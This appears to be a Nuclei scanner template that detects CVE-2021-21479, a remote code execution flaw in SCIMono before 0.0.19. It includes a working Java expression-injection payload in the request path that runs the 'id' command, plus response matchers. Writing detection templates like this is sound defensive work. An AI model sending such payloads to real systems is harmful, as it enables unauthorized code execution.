id: CVE-2021-21479

info:
  name: SCIMono <0.0.19 - Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: |
    SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and
    execute java expressions and compromise the availability and integrity of the system.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21479
    - https://github.com/SAP/scimono/security/advisories/GHSA-29q4-gxjq-rx5c
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2021-21479
    cwe-id: CWE-74
  tags: cve,cve2021,scimono,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"

    matchers:
      - type: word
        words:
          - "The attribute value"
          - "java.lang.UNIXProcess@"
          - "has invalid value!"
          - '"status" : "400"'
        part: body
        condition: and

# Enhanced by mp on 2022/05/05